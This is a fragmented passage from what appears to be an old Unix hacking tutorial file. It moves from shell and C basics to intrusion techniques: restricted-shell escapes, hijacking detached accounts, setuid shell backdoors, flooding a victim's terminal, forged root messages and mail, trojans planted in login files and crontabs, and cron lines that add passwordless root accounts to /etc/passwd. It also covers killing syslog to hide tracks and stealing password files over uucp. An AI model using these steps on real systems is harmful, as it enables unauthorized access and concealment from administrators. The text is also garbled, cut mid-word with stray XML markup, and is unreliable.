wit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TEST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arG=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             arg&lt;&gt;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here about string tests. You must enclose the names of the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 (like "$arG") if you wish the test to take into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, otherwise space characters are ignored, and "    blue"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ame as "b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EXISTANCE OF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[option]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TEST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      variable has a leng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variable has a length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ESTS WITH -A AND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stand for "and" (-a) and "or" (-o). The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es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G = arg2 -o arG =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true condition is returned if arG=arg2 or arG=ar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WITH IF/THEN/ELSE/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is condition is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do the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arG =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cho "argument 1 is the same as argum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etty much self-explanatory. If the condition test on the i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rue value, the the commands following "then" are carried ou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 stateme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is condition is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do the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[do the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pretty much self explanatory. The same as the above, except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n't true, the commands following else are carried out, until f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is condition is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do the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f [this condition is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do the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if command executes another condition test if the first condition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and if the elif's condition test returns a true value, the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en statement are then carried out. Stands for "else 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/D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this condition is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do the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s the commands following "then" for as long as the conditio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" is tru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 $looper !=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$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ill read the value of the variable looper from the keyboard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, and ends if the value of looper is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mall tutorial by no means is a complete guide to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Look at shell scripts on the systems you crack and foll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Remember, that you can accomplish a great deal by comb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ntrol structures (such as having an if/then condition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a while/do loop if the condition is true, etc.) and by using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, pipes, etc. My next Unix file will cover more advance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and examine shell programming on another popular she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y C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is sort of the "official" language of Unix. Most of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as written in C, and just about every system I've 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ad the C compiler. The command to invoke the c compiler is cc.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cc [filename]", where filename is the name of the fil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(The filename must end in .c) You can create the source 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the system's text editors. The include files, stdio.h and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in a directory on the system. You do not have to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n your current directory when you compile the file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this directory for them. If you wish to include any file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library, they must be in your current directory.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a file called "a.out"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working on a very large program, you will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it up into small modules. You compile the individual modules with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which only generates the object files for the module. The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editor to combine and compile the object files. The objec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with the same name as the source files, but the file exten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from .c to .o   When you have created all the object fil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, combine them with the ld (link editor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/lib/crtO.o [module] [module]... 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give you the final, compiled program, in a file named a.ou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/lib/crtO.o part1.o part2.o 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meber to include /lib/crtO.o and the -lc parts in the comma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shown. Also, the object files must be specified in the l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that they must be in the program (for instance, if part1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, part2 can't be BEFORE par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ERRORS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t command checks for errors and incompatibility errors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Type "lint [c source-code file]". Not all of the message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t are errors which will prevent the program from compiling or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As stated, it will report lines of code which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to other Unix systems, unused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BEAU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b (C beautifier) program formats C source code in an easy to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tty" style. The format is "cb [file]". The output is to the screen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ut the formatted source code into a file, you must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x C compiler has a command called system that executes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programs as if you had typed in the commands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command l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 line is any command line you can execute from the shell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cat /etc/passw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hich performs a similar function is execvp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vp("comma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trick is to execute a shell program using execvp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unction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it, kiddies, the one you've waded through all that ro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ense for! This section will describe advanced hacking techniques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chniques are methods of defeating internal security (I.E. securit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ctually inside the system). There is little to be said on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cking into the system itself that hasn't already been said in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n logging in, Unix accounts, and Unix passwords. I will s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- it's easier, and faster, to password hack your way from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to a user account. Once you're actually inside the syste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, using the techniques described in this section, almost easy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user access on most systems. (Not to mention that nothing is qui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ing as spending 3 days hacking the root account on a system,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message "not on console-disconnecting" when you finall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assword.) If you do not have a good understanding of the Unix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some of its more important utilities already,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arts of this file before going on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RSH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sh (restricted Bourne shell) shell attempts to limit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 user by preventing him from executing commands outsid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path, and preventing him from changing directories. It also prev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hanging the value of shell variables directly (i.e.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=value"). There are some easy ways to overcome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eference any file and directory in the system by simp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 pathname. You can't change directories like this, or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utside of your searchpath, but you can do such things as lis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directories, edit files in other directories, etc.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ecessary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ggest flaw in rsh security is that the restri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ignored when the account's profile file is executed upon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, if you have access to the edit command, or some other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your account's profile, you can add a line to add a director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path, thereby letting you execute any programs in that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on changing directories is also ignored during logon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. So, if you absolutely, positively HAVE to go to an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cd command your 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COPY AND WRIT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imple trick. If you have read access t a file, bu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because of directory protections, simply redirect the output of th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to another file. If you have write access to a directory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ccess to a specific file, you can create a copy of the file,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it will be owned by your account), delete the original, and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the nam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big security hole in many Unix systems. Occasionally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disconnected without logging off, his account may remain on-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ttached to the tty he was connected to the system through. Now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calls to the system and and gets connected to that tty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ide the system, inside the disconnected user's accoun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interesting ways to take advantage of this flaw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to gain the passwords to more account, you can set a decoy progra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 the login sequence, execute the program, and then disconn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Soon, some unlucky user will call the system and be switch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ed account's tty. When they enter their username and password, the dec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re their input in a file on the system, display the message "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", and then kill the detached account's shell process, thus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t the real login prompt. A Unix decoy written by Shooting Sha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uid bit is set on a shell program, executing this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user id to the user id of the account that owns the shell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full use of that account, until you press control-d (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hell process) and return to your normal user id. This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execute any commands under that account's user id. This is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account's password, since as long as the file remai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can continue to make use of that account, even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When I gain control of an account, I usually make a copy of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gged in under that account in a nice, out of the way directory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id and gid bits. That way, if I should happen to lose the accou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the password were changed), I could log in under anoth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make use of the lost account by executing the ui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easy means of gaining the use of an account on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ched account flaw. Usually, most terminal device files will hav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ermission, so that the user that logs in under it can receiv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write (unless he turns off messages with the mesg n command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cat a file into the user's terminal device file. A compil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all kinds of strange control characters and garbage, works nicely.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logged in on tty03. Just type cat /bin/sh &gt; /dev/tty03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thing like this on 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YD;uiayh;fjahfasnf kajbg;aev;iuaeb/vkjeb/kgjebg;iwurghjiugj;di v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/fujhf;shf;j;kajbv;jfa;vdblwituwoet8y6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8ybp959vqvq43p8ytpgyeerv98tyq438pt634956b    v856    -868vcf-56-</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>e8w9v6bc[6[b6r8wp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ehe! Now, the poor devil is confused. He tries to press break- no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rbage just keeps coming. He tries to enter various commands,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. Catting a file into his terminal device file "ties it up", so to sp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this is the file through which all I/O with his terminal is done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 almost impossible to get any input through to the shell. He ca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ff! So, in desperation, he disconnects... It is best to execute th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a background process, so that you can keep an eye on the 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Usually, the user will call the system back and, unless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 back into his old detached account (in which case he will usually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gain), he will kill the detached account's login process. So, if you se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system using the same username, you know he's logged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. Anyways...after an appropriate length of time, and you feel that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, log off and call the system back a few times until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 into the detached account. Then just create a uid shell ow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you can use it any time you please, even though you don't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Just remember one thing, though-when the cat command ha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compiled file on the victim's screen, if he is still log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erminal, he will regain control. Use a lo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ING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able to write to other people's terminal files also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fake write messages from any user on the system.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ake a message from root. Edit a file to contain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root console ^g [note control-g (bell)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change your password to "commie" before logging off today.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 [don't forget to put this-&lt;EOF&gt;-in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"who" to find bill's tty devic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filename] &gt;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root console [beep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change your password to "commie" before logging off today.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 PERMISSI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 checks file permissions every time you issue a write or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 file. It only checks read permissions, however,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the read command. For instance, if you issued the command to c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file, and someone changed the file's permissions so t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read permission while the process was still being executed, th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RMINA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, if you have some means of assuming an account's use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having a uid shell for that account), you can read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's terminal on-line. Just execute the uid shell and type "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ttyxx &amp;" (which will execute the cat command in the background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display the contents to your screen, but will also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. Once the person logs off, ownership of his terminal devic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 to root (terminal device files are temporarily owned b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 under them), but since you had the proper permiss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he read process, you can still continue to view the conten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file, and can watch, online, as the next use logs in.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trick that can sometimes be used to gain the root passwo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xercised as a last resort, since it involved revealing your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acker to the superuser. On many systems, the superuser also has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ccount that he uses for personal business, and only uses the roo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 management purposes. (This is, actually, a rather smar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, as it lessens the chances of, say, things like his executing a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program while under the root account, which, to say the least,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rous [from his point of view].) If you can obtain a uid shell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ccount, simply execute a read process of his terminal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(while under the uid shell), and then drop back into you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hen send him a write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ormat your winch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uses the su command to go to the superuser account to kick you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can sit back and watch him type in the root password. (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done if you have more than one account on the system- remember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ll not let you log into a superuser account remotely, and if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you have is a superuser account, you are effectively lock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CP/IP protocol is a common protocol for file transf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systems, and between Unix and other operating systems. If the Uni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features TCP/IP file transfers, it will have the telnet program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usually in the directory /bin.  This can be used to fake mail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n the system. Type "telnet" to execute the telnet program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rompt, type "open [name] 25", where name is the uucp network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you are on. This will connect you to the system's 25th port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etwork mail. Once conn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t to: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is the name of the user you wish to send mail to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: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er is the name of the use you wish the mail to appear fro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pecify a non-existant user. You can also fake network mail from a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ystem. For information on the format of the addres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cp facilities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enter the message. Enter "." on a blank line to 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ail. When you'e finished sending mail, type "quit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Kid&amp;CO. from Private Sector/2600 Magazine for that nove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old, OLD subject, and there's little original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bout it. Trojan horses are programs that appear to execute on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ctually perform another. This is perhaps the most common means of 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easiest means of setting up a Unix trojan horse i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named after a system command, such as ls, "in the way" of some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. For instance, if a user's searchpath is ".:/usr/bin"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tem searches the user's current directory for a command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lace a shell script in the user's home directory called "ls"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created a copy of the shell, set the new shell file's uid and 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echo an error message (such as "lsa: not found", lead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he mistyped the command and the offending character was not echoed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e noise or whatever), and delete itself. When the user executes the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his directory, the uid shell is created. Another good idea i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trojan to a command in the user's login file, have i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 shell, execute the real command, and then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good way to set up a trojan horse is to include a few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's login file. Simply look at the user's password file entry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ell he logs in under, and then modify the appropriate login fil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if it doesn't exist) to create a uid shell when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 modify a user's fil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spool/cron/crontabs, you can add an entry to create a uid shell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* * * * * as the times, and wait about 1-2 minutes. In 1 minu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 utility will execute the commands in the user's crontab file.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ntry. Again, if the user doesn't have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ron/crontabs, you can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ast note- be sure you give the trojan horse execute permission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victim will receive the message "[filename]- cannot execute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 dead give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UI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write access to a uid file, you can easily modif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hell. First, copy the file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/bin/sh &gt; [ui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place the file's contents with a shell program, but the ui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set. Then execute the file and create a well-hidden uid she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ubverted uid file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CCOUNT TO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an account to a Unix system, you must have writ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ile, or access to the root account so that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ile's protections. To add an account, simply edit th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editor, edit (or any of the other Unix editors, if you wish).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name]::[user#]:[group#]:[description]:[home directory]:[pathname of sh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assword field is left blank. To set the passwo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enter and verify a password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he account to have superuser privileges, it must hav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ckdoor is a means of by-passing a system's normal secu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unauthorized users out. For all the talk about back door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accomplished. But creating a backdoor in Unix System V is really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It simply requires adding a few entrie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ib/crontab or /usr/spool/cron/crontabs/root. (Again, if the fil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can create it.) Add these lines, which will create 2 acc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ne a user account ("prop") and one a superuser account ("prop2"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m system time every night, and delete them at 2 am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* * * chmod +w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* * * echo "prop::1:1::/:/bin/sh" &gt;&gt;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* * * echo "prop2::0:0::/:/bin/sh" &gt;&gt;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 * * * grep -v "prop*:" /etc/passwd &gt; /usr/spool/uucppublic/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 * * * cat /usr/spool/uucppublic/.p &gt;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 * * * chmod -w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2 * * * rm /usr/spool/uucppublic/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YOU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, you want to keep your cover, and not leave any tr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hacker on the system. This section will give you some tip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just that. First of all, the Unix system keeps track of when a file wa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see the information on the command ls -l in the section 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rotections). You don't want anyone noticing that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ed with recently, so after screwing around with a file, i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you should return its last modified date to its previous val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command. The syntax for the touch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hhmmMMdd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h is the hour, mm is the minute, MM is the month, and dd is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] is the name of the file you wish to change the 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usually gives hackers away are files they create on a syst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reate files and directories, make use of the hidden file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ry to hide them in directories that are rarely "ls"'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spool/lp, /usr/lib/uucp, etc (in other words, directories whos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tampered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use of the mail facilities, as anyone with the proper acc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/usr/mail files. If you must send mail to another hack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write the message into a text file first, and encrypt it. Then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ipient, who can save the message without the mail header using th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adding additional superuser accounts to a system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 better to add simple user accounts (which don't stand out qui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) and use a root uid shell (judiciously hidden in a rarely used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 need superuser privileges. It's best to use a user accoun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, and only go to the superuser account whenever you absolute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user priv's. This may prevent damaging accidents. And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home directory for any accounts you add. I've always found i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isting directories, or to add a hidden subdirectory to a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ystems have "watchdog" programs which log off inactiv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ertain period of time. These programs usually keep logs of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vityl. Avoid sitting on the sitting doing nothing for long peri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using some of the methods described in this file, you ma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's file with a modified copy. This copy will be owned by your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stead of the account which owned the original. You can change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original owner's group with the chgrp command, the format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rp [groupname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owner back to the original with the chow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wn [user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hange ownership or group ownership of a file, the uid and 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respectively are reset, so you can't copy the shell, set its uid b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owner to root to gain superus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all, just be careful and watch your step! Unix is a very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and even though it comes equipped with very little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ounting, it is easy to add your own security features to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rong, such as attempting to log in under a superus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 only to see "not on console-goodbye", assume that a note is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ident somewhere on the system. Never assume that something [anything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noticed. And leave the system and its files exactly as you foun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use a little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a real klutze, you can turn off the error logging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oot capabilities). I will include information on System V error log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ost Unix clones will have error logging facilities similar to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y Standard Distribution (BSD) Unix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Y (BSD) UNIX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cat /etc/syslog.pid". Thi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number of the syslog (error logging) program. Kill this proc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op the error logging. Remember to start the logging process back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hrough stumbling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e where the error messages are s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/etc/syslog.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etc/err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the priority of the error, and the file is the file tha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priority or higher are logged to. If you see an entry with /dev/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log file, watch out! Errors of that priority will result i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eing displayed on the system console. Sometimes, a list of user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llow an entry for errorlogging. This means that these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any priorities of that lev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9 levels of priority to errors, and an estimation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-Lowly errors. This information is just unimportant junk used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errors in the system operation that usually won't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Usually discarded withou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-Usually just thrown away. These messages provid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operation, but nothing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-Not greatly important, but stored for inform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-System errors which can be recove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-This is the priority generally given to errors caused by hack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rrors, but important information, such as security viola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login and su attempts, attempts to access files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-Errors of higher priority tha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-Major hardware and softw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-An error that requires immediate attention...very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-***&lt;&lt;&lt;(((CRAAASSSHHH!!!)))&gt;&gt;&gt;**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V error logging is relatively simple compared to Berkely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logging. The System V error logging program is errdemon.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d of the error logging program, type "ps -uroot". This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processes run under the root id. You will find /etc/errd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list. Kill the process, and no more error logg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demon program is not as sophisticated as BSD Unix's syslog program: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all errors into a file (the default file is /usr/adm/errfile, bu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specified as an argument to the program when it is star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demon does not analyze the errors as syslog does, it simply takes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evice file called /dev/error and dumps them into the error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wish to examine the error report, use the errpt progra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report of the errors in the error logging file and prints i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ard output. The format is: errpt [option] [error logging file]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ort of all errors, use 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pt -a /usr/adm/er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very technical, however, and not of much use to the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will cover the workings and use of the Unix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UUCP stands for Unix to Unix Copy. The uucp utilities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f files between Unix systems. There also facilities for users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interact with remote systems, and for executing limited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s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 outward dialing is cu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-n[pho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-n1312528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 of Unix, the format was simply "cu [phone numb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at the format of the phone number may be different from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 for instance, a system that dials outward off of a pbx may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refixed by a 9, and one that uses an extender may no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(if long distance) preceded by a 1. To dial out, however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facilities for dialing out. The file /usr/lib/uucp/Device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devices on earlier systems) will contain a list of the available dial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Entries in this file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 type]  [device name]  [dial device]  [linespeed]  [protocol,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ype is one of 2 types: ACU and DIR. If ACU, it is a dialout device.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irect connection to a specific system.  Device nam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of the dialout device's device file, which is located in the /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Dial device is usually an unused field. It was used on old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ne device (device name in the above example) was used to exchang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device (dial device, above) did the telephone dialing. In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odial modem, this is a rarely used feature. The next, linespe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rate of the device, usually either 300, 1200, or 2400, possibly 4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9600 if the device is a direct connection. The protocol fiel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communications protocol. This field is optional and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. Here is an example entry for a dialout device and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  tty99  unused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tty03  unused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alout device is capable of more than one baud rate, it must ha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Devices (L-devices) file, one for each baud rate. Not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 the above example is a tty- usually, dialout device name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tty##, as they can be used both for dialing out, and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. The device can be named anyth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orth mentioning to c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Allows you to specify the baud rate. There must be a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file with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Allows you to specify which devic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to a system that there is a direct connection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"cu -l[device]". This will connect you to it. You can also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irectly connect to a dialout device, from which point, if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accepts, you can give it the dial comman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 command is basically the same as using a terminal program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to connect to a system, you then interact with that system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d it directly from a terminal. Like any good terminal program, the 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rminal program" provides facilities for file transfers, and oth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.                 -Disconnec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!                 -Temporarily execute a shell on the local syst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to return to the remote system, press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![cmd]            -Execute a command on the local system. Example: ^!l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$[cmd]            -Execute a command on the local system and send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%put F f2        -Sends a file to the remote system. F1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 local system, and f2 is the name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made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ake F f2        -Copies a file from the remote to the local system. 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remote file, and f2 is the name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at the commands for transferring output and files will only wor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unicating with anothe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be wondering how you can find out the format for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which is necessary to dial out. The format can b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/usr/lib/uucp/Systems (called L.sys on earlier Unix systems)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uucp network names and phone numbers of other Unix system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other information about them. This file contains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out uucp file transfers with the systems listed within it.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 name]  [times]  [devicename]  [linespeed]  [phone number]  [login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is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s a list of the times when the system can be contacted. This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just have the entry "Any", which means that the system can be cont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. Never means that the system can never be called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specific days and times when the system can be contacted. The d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u is Sunday, Mo is Monday, etc. If the system can be called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of the week, you can string the days together like this:SuMoT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, Monday, and Tuesday. You can also specify a range of hou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be called, in the 24 hour format, like this: Su,0000-0100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an be called Sunday from midnight to 1am. The week days (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) can be abbreviated as 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name is the name of the device to call the system with. If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connected, this file will contain the base name of the device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which connects it to the local system. If the system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over the phone, this field will be "AC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peed is the baud rate needed to connect to the system.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vailable with the specified baud rate to contac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s the phone number of the system. By looking at thes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 format for the phone number. For instance, i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"913125285020" for an entry, you would know that the form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+1+area code+prefix+suf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n field contains information used for uucp transfers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you will see alphabetic or other strang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field. Sometimes, these may be commands for the particula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m that the system is using to dialout, but other times,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 a part of the phone number. If so, the meaning of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kens can be found in the file /usr/lib/uucp/Dialcod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-dialcodes on earlier systems). Entries in this file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ean that the token chicago means to dial 312. So, if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 Systems entry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528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o dial 3125285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an entry to the Systems file for systems that you wish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. Simply edit the file using one of the Unix system's edi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o  Any ACU 1200 13125285020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y time you wished to call the BBS Ripco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rip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ystem would do the dialing for you, drawing the phone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Ripco in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UCP TRANSF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will detail how a uucp file transfer works. When you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transfer a file to/from a remote system, the local system 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the remote system. Then, using the information contained in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Systems file, it logs into an account on the remote syste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manner as you would log into a Unix system. Usuall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accounts use a special shell, called uucico, which implement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features which (are supposed to) keep the uucp account from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ther purpose than file transfers with another Unix system. (Note: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ucp accounts will use this shell.) If you've ever logged into the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n the system and received the message, "Shere=[system name]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ouldn't respond to any of your input, that account was using the uuc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which prevents the account from being used as a normal "user"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ystem then requests the transfer, and if security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 which will be discussed later do not prevent the transf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opied to (or from if you requested to send a file)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account is then logged off of the remote system, and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OGIN FIELD TO A SYSTE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uperusers feel that if the uucp account uses the uucico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"secure". Because of this, they may ignore other uuc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, and probably not give the account a password. If you fin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can add an entry for the system to the Systems (L.sys)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nix system and try to, say, transfer a copy of its password fil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, simply follow the outline in the section on cu for how to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s file. That will cover everything but how to add the login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over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in section consists of expect/sendsubfields. For example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logi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in: uucp assword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bfield is what is expected from the remote system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gin:". This means to expect the login prompt, "Login:". Note,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nter the complete text that the remote system sends, the text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mote system is scanned left to right as it is sen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ext is found. The second subfield contains the local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which is sent to the remote system. In this case, the lo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"uucp" when it receives the login prompt. Next, the local system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rom the remote system until it receives "assword:" ("password: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s "uucp" (the password, in this example, for the uucp acc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line noise or other interference, when the local system conn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, it may not receive the expected string. For this possibili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the expected string several tim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in:-ogin: uucp assword:-assword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 separates that if the expected string is not received, to ex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specified after the hyphen. Sometimes, you may need to send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such as kill or newline, to the system if the expected str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You can do t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in:-BREAK-ogin: uucp assword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BREAK- means that if ogin: isn't received the first time, to send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o the remote system, and then expect ogin: again. Other commo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in:-@-ogin:           Send a kill character if the expected str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n:-EOT-ogin:         Send a control-D if the expected string isn'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in:--ogin:            Send a null character if the expected string is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you wish to transfer files with doesn't send anyth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nect to it, (say, you have to press return first), the firs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hould be "" (nothing), and the first send field should be \r (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. There are certain characters, like return, which ar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mbols or combinations of characters. Here is a list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              -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-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-Null/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             -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LOG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, the login entry for a system might contain more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expect the login prompt, send the username, expect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and send the password. For instance, if you have to go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xer to get to the system, the login field would contain a sub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system from the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, on systems, that use the Hayes smartmodem to dial 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field may be left unused (will contain an arbitrary entr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UNUSED"), and the dialing command will be contained in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o  Any ACU 1200 UNUSED  "" ATDT13125285020 CONNECT \r ernumber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try to transfer a file with a Unix system called "ripc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USED" is sent to the Hayes smartmodem. Of course, this is not a valid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o it is ignored by the modem. Next, the system moves the login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xpect subfield is "", which means to expect nothing. It then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ATDT13125285020", which is a Hayes dialing comand, which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dial 13125285020. When the string "CONNECT" is received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martmodem will respond with when it connects), the system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and waits for the "Usernumber:" prompt. When it receive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"new". This completes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've completed an entry for the Unix system you wish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, you can issue the uucp command, and attempt the transf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copy a file from the remote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remote![file pathname] [local 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mote is the name of the system you wish to copy the file from, [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] is the pathname of the file you wish to copy, and [local pathname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 of the file on the local system that you wish to nam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de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from the local system to the remote system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[local pathname] remote![file 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local pathname] is the file on the local system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o the remote system, remote is the name of the remote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 pathname] is the pathname you wish to give to the copy to be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copy the ripco system's password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ripco!/etc/passwd /usr/spool/uucppublic/ripc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, hopefully, copy the password file from ripco into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ystem called /usr/spool/uucppublic/ripcofile.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spool/uucppublic is a directory set up especially for the re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-transferred files, although you can have the file copied to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directory permissions don't preven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UC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what if your transfer did not go through? Well, this s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ow to find out what went wrong, and how to corr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ulog command is used to draw up a log of transactions with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You can either draw up the entries by system name,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initiate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purposes, we only want to draw up the log by system name.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log -s[syste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is will pull up the logs for ALL transactions with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We only want the logs for the last attempted transa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Unfortunately, this can't be done, you'll just have to sor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until you reach the sequence of the last transaction. If the logs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 long time, say about a week, however, you can use the grep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logs only for a certai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log -s[system] \ grep mm/d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m is the month (in the form ##, such as 12 or 01) and dd is the d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m). This takes the output of the uulog command, and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 with the grep command and only prints out those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date the grep command is searching for. The log entrie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name] [system] (month/day-hour:minute-pid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-Is the userid of the account that initiate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-Is the name of the system that the transaction w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day       -Dat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:minute     -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number      -The transfer'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-The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ypical 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ripco (11/20-2:00-1234) SUCCEEDED (call to rip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the root account initiated a transaction with the Rip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system was contacted on November 20, at 2:00. The job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planation of the various log messages you will encou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CCEEDED (call to [system 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successfully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AL FAILED (call to [system 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failed to contact the system. The phone number entry for the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 may be wrong, or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K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the remote system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GI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was unable to log into the remote system. There may be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field in the entry for the remote system in the Systems file, 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may have caused the logi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RONG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's entry in the Systems file has the wrong name for the syst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specifi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OTE DOES NOT KN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ystem does not recognize the name of the local system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ransactions with an unknown system (some will, some won't...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uucp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QUEST ([remote file] --&gt; [local file]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has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K (convers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 prevented th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is error, you will receive mail on the local system infor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fer was denied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VIC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alout devices we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transaction log will usu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ripco (11/20-2:00-1234) SUCCEEDED (call to rip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ripco (11/20-2:01-1234) OK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ripco (11/20-2:01-1234) REQUEST (ripco!/etc/passwd --&gt; /ripcofil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ripco (11/20-2:03 1234) OK (convers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error occurs during a transfer with a system, a statu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that system, and remains for a set period of time, usually ab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During this time, that system cannot be contacted. These fil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version of Unix you are on, will either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, an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T..[system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ll be in the directory /usr/spool/uucp/.Status, and have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These status files will contain the reason that the last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ith the system failed. These files are periodically purged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act the system before its status file is purged, you m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ing the failed transfer request will also remai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test version of System V, these files will be in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/usr/spool/uucp. For instance, if the system is called rip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be in the directory /usr/spool/uucp/ripco. On other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 be in the directory /usr/spool/uucp/C., or /usr/spool/uu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[system name]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system name] is the name of the system to be contacted, and AAAAA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's uucp job number. (You can see the transfer request's job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j option when you initiate the transfe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cp -j ripco!/etc/passwd /usr/spool/uucppublic/ripcofile" would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the ripco system's password file, and display the job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) Type "cat C.system[jobnumber]", and you will se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/etc/passwd /usr/pub/.dopeypasswd root -dc dummy 777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lier versions of Unix, these files will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spool/uucp/C. To find the file containing your transfer,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s until you find the proper one. If your transfer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transfer request file and the status file, correct any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 or whatever,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uucp access to files has to be restricted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, from any system, could copy any file from the remote sys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cover the security features of the uuc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/usr/lib/uucp/USERFILE contains a list of th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s can copy from, and local users can send files from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entries in this file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al user],[system] [callback?]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      -Is the username of a local account. This i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stricting which directories a local user can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o a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      -Is the name of a remote system. This is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ng which directories a specific remot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?       -If there is a c in this field, then if a transfer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rom the system indicated in the system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system (in this case, the local system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receives the transfer request, rath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itiated it) will hang up and call the remote back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indicated in the remote's entry in the lo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file) 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   -Is a list of the pathnames of the directorie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indicated in the system field can copy files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user indicated in the local user field can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dork,ripco -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user local_dork can only send files to a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in the directory /usr/spool/uucppublic, and the remote system rip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copy files from the local system that ar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spool/uucppublic. This is typical: often, remotes are only allow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at directory, and if they wish to copy a file from anothe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, they must notify a user on the system to move tha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public directory. When a transfer request is received from a remot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ystem scans through the userfile, ignoring the local user field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strict transfers with a particular user from a remote system...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granted to a system in the USERFILE is granted to all user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, until it finds the entry for that system, and if the system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o or from that directory, the transfer is allowed,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. If an entry for that system is not found, the USERFIL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 entry with a null system name (in other words, an entry with n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pecified) is found, and the directory permissions for that en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no entry is found with a null system name, the transfer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quirks about USERFILE entries. First, if you have cop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rectory, you also have copy access to any directories below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ree. Thus, lazy system operators, rather than carefully lim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access to only the directories it needs access to, often jus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py access to the root directory, thus giving them copy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ystem tree. Yet another mistake made by careless superusers is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name field empty in the entries for the local users. Thus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doesn't have an entry in the USERFILE requests a transf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ystem, when the USERFILE is scanned for an entry with a nul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if the entries for the local users come first in the USERFILE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first entry for a local user it finds, since it has a nul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the system name field. Note, that none of these security feature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f the uucp account on the system the transfer is requested wit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ucico shell. In any case, whether the account uses the uucico sh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even if you have copy access to a directory, individual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s may prevent the copying. For information on uucp security in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ersion of the uucp facilities, see the piece on the Permiss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uux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 ON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2 commands for executing commands on a remote system- uu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h (remote shell- this has nothing to do with the rsh shell [restricted Bou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]). This section will cover the use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ux command is one of the uucp utilities. This is used,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, but for executing non-interactive commands on a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n-interactive, I mean commands that don't request input from the us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mmediately when issued, such as rm and cp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 remote!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mote is the name of the remote system to perform the command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(command line) is the command to be performed, and any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You will not receive any of the commnand's output, so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for, say, printing the contents of a text file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ucp account on the remote system uses the uucico she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urity features ap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/usr/lib/uucp/Commands file contains a list of the comma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 can execute on the system. By remote system, in this case,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hat the user who initiates the uux command is on, and lo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ean the system that receives the uux request. Entrie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uucp/Commands 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to infin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, PATH=[pathname], sets the searchpath for the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uux execution of a command on the local system. This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same as, say, a line in a login file that sets the searchpat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ccount, example: PATH=/bin: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the searchpath to search first the directory /bin, and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bin when a command is issued. The following entries are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programs/commands that the remote can execute on the loca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ogram/command in this list is followed by a comma an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i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,rip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remote system Ripco can execute the rmail and lp comma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. Usually, only the lp and rmail command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we come to another, "different" version of the uucp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mands a remote system can execute on the lo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tained in the file /usr/lib/uucp/Permissions. Entries in thi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=[remote] COMMANDS=[commands] REQUEST=[yes/no] SEND=[yes/no] R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] WRITE=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is the name of the remote system. Commands is a list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y execute on the local system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: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n/rmail:/usr/bin/ne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s (or no) aft er "REQUEST=" tells whether or not the remote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local system. The yes/no after "SEND=" tells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 can send files to the local system. The list of directori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=" tells which directories the remote can copy files from (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EQUEST privileges), and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:pathname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:/usr/lib/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s before, the remote has copy access to any directories that ar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 in the list in the system tree. The list of directori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ITE=" is in the same form as the list of directories after "READ=",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irectories that the remote can copy files TO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new feature which I have seen on a few systems. This i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of my knowledge, a System V feature, but a packag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party software vendors. If the rsh command is featured on a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(rsh) Bourne shell will be renamed rshell. Rsh stands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and is for the execution of any command, interactive or otherwise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The command is executed realtime, and the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be sent to your display. Any keys you press while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ecuted will be sent to the remote system, including brea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[system]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ripco ca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out the /etc/passwd file of the Ripco system on your screen.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my knowledge, the only security features of the rsh comman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and directory protections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NAME AND UU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2 commands which are for use by users to show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ystem's uucp facilities. Uuname gives a list of all the system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s (L.sys) file, and uustat gives a list of all pending uucp/u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different ways of sending mail to user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First of all, using the uucp and uux commands. Simply edi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message you wish to send, and uucp a copy of it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n send it to the target user on that system using the u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 system!rmail [username] &lt;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ystem is the name of the system the target user is on, user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user you wish to send the mail to, and pathname is the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you sent to the remote system. This method works by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il command (Receive Mail), the syntax of which is "rmail [user]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its input from the file you sent to the remote. This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 if the remote allows users from your local system to execut the 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method is for systems which feature the remote shell (r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f the remote system can be contacted by your local system via r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system!mail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connected, enter your messag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ast method is the method of sending mail over uucp network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the one employed by USENET and other large uucp network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er and/or private networks. This method uses the simple mai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!system!system![and so on to infinity]!system@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systems is the routing to the target system, and user is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on the target system. The routing takes a bit of explanation.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uucp network with conne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2             uni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4-------------uni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twork map shows what systems are on the network, and which syst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which other systems in its Systems (L.sys) file.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1 has entries for unix2 and unix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2 has entries for unix1 and unix4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3 has entries for unix1 and unix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4 has entries for unix2 and unix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5 has entries for unix3 and unix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o explain the routing. If unix1 wanted to reach unix5, it couldn't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since it has no means of reaching it (no entry for it in it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So, it would "forward" the mail through a series of other system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end mail to the user root on unix5, any of these routing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3!unix5@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2!unix4!unix5@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rst routing would be the shortest and quickest. So, to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unix1 to the root user on unix5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unix3!unix5@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in your message and press control-D when finished, and the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will delive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this is it- the end of the file. I hope you've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 and helpful. Before I go on, I'd like to thank a few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made writing this file either A: possible or B: easi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Hawke I, for sharing many a Unix accou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 (of 312), for helping me get started in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- for helping me hack a large network of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Warlord, for helping me with a BSD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Shark, for his C decoy, and more than a few good posts o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&amp;Co, for providing me with some information on the Teln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ly but not leastly, Bellcore, Southern Bell, and BOC'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or the use of their systems. Thanks,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